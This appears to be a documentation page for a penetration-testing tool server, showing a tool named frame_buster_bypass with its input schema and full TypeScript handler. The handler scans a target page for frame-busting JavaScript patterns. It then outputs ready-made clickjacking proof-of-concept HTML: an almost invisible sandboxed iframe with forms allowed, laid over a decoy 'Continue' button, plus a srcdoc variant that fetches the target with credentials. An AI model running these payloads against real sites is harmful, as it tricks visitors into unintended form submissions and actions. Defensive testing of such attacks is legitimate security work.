frame_buster_bypass
Test sandbox attribute bypass for JavaScript frame busters. Generates PoC HTML that uses iframe sandbox='allow-forms' to disable JavaScript execution while allowing form submission for clickjacking.
Instructions
Test sandbox attribute bypass for JavaScript frame busters. Generates PoC HTML that uses iframe sandbox='allow-forms' to disable JavaScript execution (neutralizing frame-busting code) while still allowing form submission for clickjacking. Also checks if the target page contains common frame-busting patterns. Returns: {frame_buster_detected, patterns_found, sandbox_poc_html}. Side effects: Single GET request to detect frame-busting code.
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| target_url | Yes | URL that uses JavaScript frame-busting code |
Implementation Reference
- src/tools/clickjack.ts:128-230 (handler)Handler implementation for the frame_buster_bypass tool, which tests for common frame-busting patterns and generates PoC HTML using sandbox attributes.
server.tool( "frame_buster_bypass", "Test sandbox attribute bypass for JavaScript frame busters. Generates PoC HTML that uses iframe sandbox='allow-forms' to disable JavaScript execution (neutralizing frame-busting code) while still allowing form submission for clickjacking. Also checks if the target page contains common frame-busting patterns. Returns: {frame_buster_detected, patterns_found, sandbox_poc_html}. Side effects: Single GET request to detect frame-busting code.", { target_url: z .string() .describe("URL that uses JavaScript frame-busting code"), }, async ({ target_url }) => { requireTool("curl"); // Fetch the page to check for frame-busting code const res = await runCmd("curl", ["-sk", target_url]); const body = res.stdout; // Common frame-busting patterns const frameBusterPatterns = [ "if(self !== top)", "if (self !== top)", "if(top !== self)", "if (top !== self)", "if(window !== top)", "if (window !== top)", "if(parent !== window)", "top.location = self.location", "top.location = location", "top.location.href", "parent.location", "window.top.location", "self.location = top.location", ]; const patternsFound: string[] = []; for (const pattern of frameBusterPatterns) { if (body.includes(pattern)) { patternsFound.push(pattern); } } const frameBusterDetected = patternsFound.length > 0; // Generate sandbox bypass PoC const sandboxPoc = `<!DOCTYPE html> <html> <head> <title>Frame Buster Bypass PoC</title> <style> #target_iframe { position: relative; width: 800px; height: 600px; opacity: 0.0001; z-index: 2; } #decoy_button { position: absolute; top: 300px; left: 200px; z-index: 1; padding: 15px 30px; font-size: 18px; cursor: pointer; } </style> </head> <body> <h1>Click below to continue</h1> <button id="decoy_button">Continue</button> <!-- sandbox="allow-forms" disables JS (kills frame buster) but allows form submission --> <iframe id="target_iframe" src="${target_url}" sandbox="allow-forms"></iframe> </body> </html>`; // Also generate srcdoc variant for navigating within sandbox const srcdocPoc = `<!DOCTYPE html> <html> <head><title>Sandbox srcdoc Bypass PoC</title></head> <body> <iframe sandbox="allow-forms allow-scripts" srcdoc=" <script> // Fetch the target page inside a sandboxed context fetch('${target_url}', {credentials: 'include'}) .then(r => r.text()) .then(html => document.body.innerHTML = html); </script> "></iframe> </body> </html>`; const result = { target_url, frame_buster_detected: frameBusterDetected, patterns_found: patternsFound, sandbox_poc_html: sandboxPoc, srcdoc_poc_html: srcdocPoc, hint: frameBusterDetected ? `Frame-busting code detected (${patternsFound.length} patterns). Sandbox bypass PoC generated.` : "No frame-busting code detected. Standard clickjacking PoC may suffice.", }; return { content: [{ type: "text", text: JSON.stringify(result, null, 2) }] }; } );